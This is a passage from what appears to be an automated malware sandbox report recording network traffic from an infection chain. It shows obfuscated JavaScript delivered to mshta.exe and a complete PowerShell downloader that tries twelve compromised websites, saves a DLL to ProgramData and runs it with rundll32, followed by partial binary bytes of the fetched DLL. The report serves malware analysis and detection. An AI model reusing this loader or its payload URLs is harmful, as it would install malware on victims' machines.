                                                                                                                    Jan 28, 2022 21:24:41.342524052 CET8INData Raw: 3b 65 47 63 71 64 34 49 52 37 42 78 55 2b 3d 27 25 32 45 25 36 33 68 5c 31 34 31 72 5c 31 30 33 6f 5c 31 34 34 5c 31 34 35 41 5c 31 36 34 25 32 38 25 32 42 25 32 42 25 35 46 25 33 31 25 32 39 25 33 42 5c 31 35 34 25 33 37 25 35 42 5c 31 31 31 25
                                                                                                                    Data Ascii: ;eGcqd4IR7BxU+='%2E%63h\141r\103o\144\145A\164%28%2B%2B%5F%31%29%3B\154%37%5B\111%2B%2B%5D%3DlI%2B\151l%2D%28l%39%3C%3C%37%29%7D\167hile%28%5F%31%2B%2B%3Cl%38%29%3B%76%61\162%20l%31%3D\156e%77%20%41\162ray%28%29%2Cl%30%3D%6E%65%77%20A%72ray%28
                                                                                                                    Jan 28, 2022 21:24:41.342571020 CET10INData Raw: 37 76 16 78 7a 7f 74 7f 41 79 6a 77 14 79 06 77 7c 6f 5c 5c 72 5c 72 7f 5b 7f 70 6f 01 6d 74 7f 7d 78 6f 71 5a 74 61 7f 63 76 5b 6e 32 70 11 7c 66 7f 52 7e 2e 7a 7f 74 2d 76 67 6c 15 7f 65 73 42 78 4c 76 46 77 59 7f 6c 7f 46 7e 2d 7f 67 75 48 7f
                                                                                                                    Data Ascii: 7vxztAyjwyw|o\\r\r[pomt}xoqZtacv[n2p|fR~.zt-vglesBxLvFwYlF~-guH(mtsRt7p=t?m~nYmtn]lzayetqq(w)f,nlthoMl+=m{m~/l4l6v6l8ll;s;iv(tmnl>l,rlBnPnEnRmlHflPl*l,rlTmyn\\|DsllFvYlYlJ}vFSixs9pRojm#oEuunm
                                                                                                                    Jan 28, 2022 21:24:41.342614889 CET11INData Raw: 76 15 68 73 68 67 68 7a 61 7c 31 67 0c 68 6d 7f 74 7f 29 7f 2e 7f 44 67 10 68 1f 7f 7d 75 55 67 16 68 11 7f 6e 7f 6c 67 1a 68 0c 68 56 7f 6f 68 77 68 3c 68 79 68 3f 68 66 68 6d 68 7c 68 44 69 4c 7f 47 7f 4e 67 03 7f 49 7f 60 7f 45 7f 60 7f 58 69
                                                                                                                    Data Ascii: vhshghza|1ghmt).Dgh}uUghnlghhVohwh<hyh?hfhmh|hDiLGNgI`E`XirJI|g.g0X~;+iq~;g*Ag$g4u_ispg,is3icJovhCuBhAGgQHAgUg?xHhG g;ggZ ing]gRg`NiLWSips?sN87) &g^hgirg]"rg]kiSxqv(x.~>iuAg]gh(8
                                                                                                                    Jan 28, 2022 21:24:41.342658997 CET12INData Raw: 32 42 25 32 42 25 32 39 25 37 42 6c 5c 31 31 37 25 32 42 25 33 44 5c 31 35 34 25 33 33 25 32 38 25 37 36 4c 47 25 33 34 25 33 38 25 33 37 25 35 31 25 33 32 25 36 36 5c 31 34 32 6e 57 25 36 32 25 35 42 69 25 36 39 25 35 44 25 32 39 25 37 44 25 33
                                                                                                                    Data Ascii: 2B%2B%29%7Bl\117%2B%3D\154%33%28%76LG%34%38%37%51%32%66\142nW%62%5Bi%69%5D%29%7D%3Bc%36%37f%39%66%28%29%3B' ;</script>...sg7gE7Jx81m00g1--><script>m5Ji2CvQ4Or ='OFdlOOxYOmZwVxameISxuCoRhhIbUOOMOUgDRyOOauvhWKKUidsTgVDqXOimIEL' ;kefg6n


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    1192.168.2.224916891.240.118.16880C:\Windows\System32\mshta.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    Jan 28, 2022 21:24:47.819864988 CET13OUTGET /qqw/aas/se.png HTTP/1.1
                                                                                                                    Host: 91.240.118.168
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Jan 28, 2022 21:24:47.878390074 CET14INHTTP/1.1 200 OK
                                                                                                                    Server: nginx/1.20.1
                                                                                                                    Date: Fri, 28 Jan 2022 20:24:47 GMT
                                                                                                                    Content-Type: image/png
                                                                                                                    Content-Length: 1178
                                                                                                                    Last-Modified: Wed, 26 Jan 2022 22:58:47 GMT
                                                                                                                    Connection: keep-alive
                                                                                                                    ETag: "61f1d227-49a"
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    Data Raw: 24 70 61 74 68 20 3d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 51 57 45 52 2e 64 6c 6c 22 3b 0d 0a 24 75 72 6c 31 20 3d 20 27 68 74 74 70 3a 2f 2f 6b 75 79 70 6f 72 6e 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 58 53 73 35 2f 27 3b 0d 0a 24 75 72 6c 32 20 3d 20 27 68 74 74 70 3a 2f 2f 6a 65 66 66 72 65 79 6c 75 62 69 6e 2e 69 67 63 6c 6f 75 74 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 76 7a 4f 47 2f 27 3b 0d 0a 24 75 72 6c 33 20 3d 20 27 68 74 74 70 3a 2f 2f 66 6c 79 62 75 73 74 72 61 76 65 6c 2e 63 6f 6d 2f 63 67 69 2d 62 69 6e 2f 32 54 6a 55 48 2f 27 3b 0d 0a 24 75 72 6c 34 20 3d 20 27 68 74 74 70 3a 2f 2f 64 6f 63 73 2d 63 6f 6e 73 74 72 75 63 74 69 6f 6e 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 4a 4a 45 66 30 6b 45 41 35 2f 27 3b 0d 0a 24 75 72 6c 35 20 3d 20 27 68 74 74 70 3a 2f 2f 77 61 6c 6c 61 63 65 62 72 61 64 6c 65 79 2e 63 6f 6d 2f 63 73 73 2f 59 63 44 63 39 32 37 53 4a 52 2f 27 3b 0d 0a 24 75 72 6c 36 20 3d 20 27 68 74 74 70 73 3a 2f 2f 61 6c 67 7a 6f 72 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 67 68 46 58 56 72 47 4c 45 68 2f 27 3b 0d 0a 24 75 72 6c 37 20 3d 20 27 68 74 74 70 73 3a 2f 2f 70 63 6f 76 65 73 74 75 64 69 6f 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 63 33 7a 67 52 69 32 77 58 77 43 62 64 53 44 33 69 7a 2f 27 3b 0d 0a 24 75 72 6c 38 20 3d 20 27 68 74 74 70 73 3a 2f 2f 67 72 75 70 6f 6d 61 72 74 69 6e 73 61 6e 63 68 65 7a 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 51 70 46 44 4a 50 4d 59 34 39 2f 27 3b 0d 0a 24 75 72 6c 39 20 3d 20 27 68 74 74 70 73 3a 2f 2f 65 6c 72 6f 69 65 79 65 63 65 6e 74 72 65 2e 6f 72 67 2f 63 67 69 2d 62 69 6e 2f 6c 34 32 73 6c 67 6d 66 38 6e 42 70 55 59 73 62 2f 27 3b 0d 0a 24 75 72 6c 31 30 20 3d 20 27 68 74 74 70 73 3a 2f 2f 62 6c 75 77 6f 6d 2d 6d 69 6c 61 6e 6f 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 46 45 6a 33 79 34 7a 2f 27 3b 0d 0a 24 75 72 6c 31 31 20 3d 20 27 68 74 74 70 73 3a 2f 2f 74 68 61 69 72 65 70 6f 72 74 63 68 61 6e 6e 65 6c 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 4b 61 57 5a 70 30 6f 64 6b 45 4f 2f 27 3b 0d 0a 24 75 72 6c 31 32 20 3d 20 27 68 74 74 70 73 3a 2f 2f 65 73 61 63 69 2d 65 67 79 70 74 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 57 37 71 58 56 65 47 70 2f 27 3b 0d 0a 0d 0a 0d 0a 24 77 65 62 20 3d 20 4e 65 77 2d 4f 62 6a 65 63 74 20 6e 65 74 2e 77 65 62 63 6c 69 65 6e 74 3b 0d 0a 24 75 72 6c 73 20 3d 20 22 24 75 72 6c 31 2c 24 75 72 6c 32 2c 24 75 72 6c 33 2c 24 75 72 6c 34 2c 24 75 72 6c 35 2c 24 75 72 6c 36 2c 24 75 72 6c 37 2c 24 75 72 6c 38 2c 24 75 72 6c 39 2c 24 75 72 6c 31 30 2c 24 75 72 6c 31 31 2c 24 75 72 6c 31 32 22 2e 73 70 6c 69 74 28 22 2c 22 29 3b 0d 0a 66 6f 72 65 61 63 68 20 28 24 75 72 6c 20 69 6e 20 24 75 72 6c 73 29 20 7b 0d 0a 20 20 20 74 72 79 20 7b 0d 0a 20 20 20 20 20 20 20 24 77 65 62 2e 44 6f 77 6e 6c 6f 61 64 46 69 6c 65 28 24 75 72 6c 2c 20 24 70 61 74 68 29 3b 0d 0a 20 20 20 20 20 20 20 69 66 20 28 28 47 65 74 2d 49 74 65 6d 20 24 70 61 74 68 29 2e 4c 65 6e 67 74 68 20 2d 67 65 20 33 30 30 30 30 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 5b 44 69 61 67 6e 6f 73 74 69 63 73 2e 50 72 6f 63 65 73 73 5d 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 62 72 65 61 6b 3b 0d 0a 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 7d 0d 0a 20 20 20 63 61 74 63 68 7b 7d 0d 0a 7d 20 0d 0a 53 6c 65 65 70 20 2d
                                                                                                                    Data Ascii: $path = "C:\ProgramData\QWER.dll";$url1 = 'http://kuyporn.com/wp-content/XSs5/';$url2 = 'http://jeffreylubin.igclout.com/wp-admin/vzOG/';$url3 = 'http://flybustravel.com/cgi-bin/2TjUH/';$url4 = 'http://docs-construction.com/wp-admin/JJEf0kEA5/';$url5 = 'http://wallacebradley.com/css/YcDc927SJR/';$url6 = 'https://algzor.com/wp-includes/ghFXVrGLEh/';$url7 = 'https://pcovestudio.com/wp-admin/c3zgRi2wXwCbdSD3iz/';$url8 = 'https://grupomartinsanchez.com/wp-admin/QpFDJPMY49/';$url9 = 'https://elroieyecentre.org/cgi-bin/l42slgmf8nBpUYsb/';$url10 = 'https://bluwom-milano.com/wp-content/FEj3y4z/';$url11 = 'https://thaireportchannel.com/wp-includes/KaWZp0odkEO/';$url12 = 'https://esaci-egypt.com/wp-includes/W7qXVeGp/';$web = New-Object net.webclient;$urls = "$url1,$url2,$url3,$url4,$url5,$url6,$url7,$url8,$url9,$url10,$url11,$url12".split(",");foreach ($url in $urls) { try { $web.DownloadFile($url, $path); if ((Get-Item $path).Length -ge 30000) { [Diagnostics.Process]; break; } } catch{}} Sleep -
                                                                                                                    Jan 28, 2022 21:24:47.878407001 CET14INData Raw: 73 20 34 3b 63 6d 64 20 2f 63 20 43 3a 5c 57 69 6e 64 6f 77 73 5c 53 79 73 57 6f 77 36 34 5c 72 75 6e 64 6c 6c 33 32 2e 65 78 65 20 27 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 51 57 45 52 2e 64 6c 6c 27 2c 41 41 44 44 3b 0d 0a 0d 0a
                                                                                                                    Data Ascii: s 4;cmd /c C:\Windows\SysWow64\rundll32.exe 'C:\ProgramData\QWER.dll',AADD;


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    2192.168.2.2249169172.67.149.20980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    Jan 28, 2022 21:24:47.971502066 CET15OUTGET /wp-content/XSs5/ HTTP/1.1
                                                                                                                    Host: kuyporn.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Jan 28, 2022 21:24:48.031068087 CET16INHTTP/1.1 200 OK
                                                                                                                    Date: Fri, 28 Jan 2022 20:24:48 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: keep-alive
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qSUayrKTMdgpKbPQ4MXKGDydjrEdM6JjR77w73yoD7Idbj3svQ0ldi3DTevTgtnI4Vjbi%2FsT2YJJMR7zvBVjf%2Bq2XN13WF2AQ1YojjHcH3aBHu873%2BfMPbRbtm0n5A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 6d4cf243debe6964-FRA
                                                                                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                    Data Raw: 31 30 64 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 63 66 5f 73 74 79 6c 65 73 2d 63 73 73 22 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73
                                                                                                                    Data Ascii: 10dc<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors
                                                                                                                    Jan 28, 2022 21:24:48.031097889 CET17INData Raw: 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 2c 70 72 6f 6a 65 63 74 69 6f 6e 22 20 2f 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79
                                                                                                                    Data Ascii: .css" type="text/css" media="screen,projection" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" type="text/css" media="screen,projection" /><![endif]--><style type="text/css">body{margi
                                                                                                                    Jan 28, 2022 21:24:48.031115055 CET19INData Raw: 73 68 69 6e 67 2e 20 50 68 69 73 68 69 6e 67 20 69 73 20 61 6e 20 61 74 74 65 6d 70 74 20 74 6f 20 61 63 71 75 69 72 65 20 70 65 72 73 6f 6e 61 6c 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 73 75 63 68 20 61 73 20 70 61 73 73 77 6f 72 64 73 20 61 6e
                                                                                                                    Data Ascii: shing. Phishing is an attempt to acquire personal information such as passwords and credit card details by pretending to be a trustworthy source.</p> <p> <form action="/cdn-cgi/phish-bypass" method="GET">
                                                                                                                    Jan 28, 2022 21:24:48.031130075 CET20INData Raw: 31 30 20 73 6d 3a 70 79 2d 34 20 73 6d 3a 70 78 2d 38 20 6d 78 2d 61 75 74 6f 20 74 65 78 74 2d 63 65 6e 74 65 72 20 73 6d 3a 74 65 78 74 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74
                                                                                                                    Data Ascii: 10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">6d4cf243debe6964</str
                                                                                                                    Jan 28, 2022 21:24:48.031141996 CET20INData Raw: 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    3192.168.2.224917074.208.236.15780C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    Jan 28, 2022 21:24:48.477128983 CET20OUTGET /wp-admin/vzOG/ HTTP/1.1
                                                                                                                    Host: jeffreylubin.igclout.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Jan 28, 2022 21:24:48.685756922 CET22INHTTP/1.1 200 OK
                                                                                                                    Content-Type: application/x-msdownload
                                                                                                                    Content-Length: 557056
                                                                                                                    Connection: keep-alive
                                                                                                                    Keep-Alive: timeout=15
                                                                                                                    Date: Fri, 28 Jan 2022 20:24:48 GMT
                                                                                                                    Server: Apache
                                                                                                                    Cache-Control: no-cache, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Fri, 28 Jan 2022 20:24:48 GMT
                                                                                                                    Content-Disposition: attachment; filename="NsLUiuT.dll"
                                                                                                                    Content-Transfer-Encoding: binary
                                                                                                                    Set-Cookie: 61f451108e964=1643401488; expires=Fri, 28-Jan-2022 20:25:48 GMT; Max-Age=60; path=/
                                                                                                                    Last-Modified: Fri, 28 Jan 2022 20:24:48 GMT
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 68 73 c2 61 2c 12 ac 32 2c 12 ac 32 2c 12 ac 32 ef 1d f3 32 26 12 ac 32 ef 1d f1 32 37 12 ac 32 2c 12 ad 32 0e 10 ac 32 0b d4 d1 32 36 12 ac 32 0b d4 c1 32 a6 12 ac 32 0b d4 c2 32 b2 12 ac 32 0b d4 d6 32 2d 12 ac 32 0b d4 d0 32 2d 12 ac 32 0b d4 d4 32 2d 12 ac 32 52 69 63 68 2c 12 ac 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 91 fa f3 61 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 50 04 00 00 20 04 00 00 00 00 00 06 0d 03 00 00 10 00 00 00 60 04 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 08 00 00 10 00 00 5d f5 08 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 2d 05 00 52 00 00 00 34 10 05 00 04 01 00 00 00 a0 05 00 50 76 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 08 00 30 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 bd 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 60 04 00 94 05 00 00 ac 0f 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 39 45 04 00 00 10 00 00 00 50 04 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 92 cd 00 00 00 60 04 00 00 d0 00 00 00 60 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 80 65 00 00 00 30 05 00 00 30 00 00 00 30 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 76 02 00 00 a0 05 00 00 80 02 00 00 60 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 76 93 00 00 00 20 08 00 00 a0 00 00 00 e0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$hsa,2,2,22&2272,2226222222-22-22-2Rich,2PELa!P `]@-R4Pv 0N@`@.text9EP `.rdata``@@.datae000@.rsrcPv`@@.relocv @B
                                                                                                                    Jan 28, 2022 21:24:48.685779095 CET23INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                    Data Ascii:
                                                                                                                    Jan 28, 2022 21:24:48.685797930 CET25INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                    Data Ascii:
                                                                                                                    Jan 28, 2022 21:24:48.685817003 CET26INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                    Data Ascii:
                                                                                                                    Jan 28, 2022 21:24:48.685838938 CET27INData Raw: 89 4d fc 8b 45 fc 83 c0 0c 83 c9 ff f0 0f c1 08 49 85 c9 7f 17 8b 55 fc 52 8b 45 fc 8b 08 8b 55 fc 8b 02 8b 11 8b c8 8b 42 04 ff d0 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 89 4d fc 8b 45 fc 8b 00 83 e8 10 8b e5 5d c3 cc cc cc
                                                                                                                    Data Ascii: MEIUREUB]UQME]UQMjjdMlYEdhE]UQMEPM"]UQM]Ui]Ujh>dPQE3PEdM
                                                                                                                    Jan 28, 2022 21:24:48.685878992 CET29INData Raw: 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 0c 8b 45 0c 89 45 f8 8b 4d 08 89 4d fc c7 45 f4 00 00 00 00 eb 09 8b 55 f4 83 c2 01 89 55 f4 8b 45 f4 3b 45 10 73 12 8b 4d fc 03 4d f4 8b 55 f8 03 55 f4 8a 02 88 01 eb dd 8b e5
                                                                                                                    Data Ascii: ]UEEMMEUUE;EsMMUU]U}thjEPb]UQjh0EPjbEE]U}tEPEM;MrE>URE}t&}
                                                                                                                    Jan 28, 2022 21:24:48.685899973 CET30INData Raw: 39 55 fc 0f 8d c0 00 00 00 8b 45 e4 8b 48 08 89 4d dc 8b 55 08 8b 42 30 83 e8 01 f7 d0 23 45 dc 89 45 d8 8b 4d e4 51 8b 55 08 52 8b 4d d4 e8 b5 fd ff ff 89 45 e0 8b 45 ec 3b 45 d8 74 0b 8b 4d e8 03 4d f0 3b 4d d8 76 48 8b 55 e4 8b 42 24 25 00 00
                                                                                                                    Data Ascii: 9UEHMUB0#EEMQURMEE;EtMM;MvHUB$%tMuUEB$%EMUQ$UEE+EETMQURMu3DEEMMUUEH$MEUREPMhu3]
                                                                                                                    Jan 28, 2022 21:24:48.685919046 CET31INData Raw: ec 8b 45 08 50 ff 15 a4 62 04 10 5d c3 cc 55 8b ec 83 ec 60 89 4d a0 c7 45 bc 00 00 00 00 c7 45 f0 00 00 00 00 6a 40 8b 45 0c 50 8b 4d a0 e8 eb f6 ff ff 85 c0 75 07 33 c0 e9 ea 03 00 00 8b 4d 08 89 4d f4 8b 55 f4 0f b7 02 3d 4d 5a 00 00 74 12 68
                                                                                                                    Data Ascii: EPb]U`MEEj@EPMu3MMU=MZthb3MQ<REPMu3MUQ<UE8PEthb3xMQLthb3WEH8thb3:U
                                                                                                                    Jan 28, 2022 21:24:48.685937881 CET33INData Raw: e8 83 c0 01 89 45 e8 8b 4d e4 83 c1 04 89 4d e4 8b 55 e0 83 c2 02 89 55 e0 8b 45 fc 8b 4d e8 3b 48 18 73 2d 8b 55 e4 8b 45 f0 03 02 50 8b 4d 0c 51 e8 3e f1 ff ff 83 c4 08 85 c0 75 12 8b 55 e0 0f b7 02 89 45 f8 c7 45 ec 01 00 00 00 eb 02 eb ad 83
                                                                                                                    Data Ascii: EMMUUEM;Hs-UEPMQ>uUEE}ujb3)MU;Qvjb3EMHUE]UMEE}uMytUMQP(UjjEHQUUzt\EEEM
                                                                                                                    Jan 28, 2022 21:24:48.685957909 CET34INData Raw: 30 05 10 2b 0d c8 30 05 10 8b 15 cc 30 05 10 0f af 15 bc 30 05 10 03 0d c8 30 05 10 03 d1 03 15 c8 30 05 10 8b 0d c8 30 05 10 0f af 0d bc 30 05 10 03 d1 2b 15 c0 30 05 10 8b 0d cc 30 05 10 0f af 0d c8 30 05 10 0f af 0d cc 30 05 10 03 d1 8b 0d cc
                                                                                                                    Data Ascii: 0+0000000+000000++0+0000000+000000++0+0000000
                                                                                                                    Jan 28, 2022 21:24:48.847829103 CET36INData Raw: 05 10 2b 0d c8 30 05 10 2b 0d c8 30 05 10 8b 15 c8 30 05 10 0f af 15 c8 30 05 10 03 ca 2b 0d cc 30 05 10 a1 c8 30 05 10 0f af 05 c4 30 05 10 0f af 05 cc 30 05 10 2b c8 8b 15 c8 30 05 10 0f af 15 bc 30 05 10 2b ca a1 c0 30 05 10 0f af 05 cc 30 05
                                                                                                                    Data Ascii: +0+000+0000+00+000++00000++00+000+00+0+000+0000+00+0


                                                                                                                    Statistics

                                                                                                                    CPU Usage

                                                                                                                    Click to jump to process

                                                                                                                    Memory Usage

                                                                                                                    Click to jump to process

                                                                                                                    High Level Behavior Distribution

                                                                                                                    Click to dive into process behavior distribution

                                                                                                                    Behavior

                                                                                                                    Click to jump to process

                                                                                                                    System Behavior

                                                                                                                    General

                                                                                                                    Target ID:0
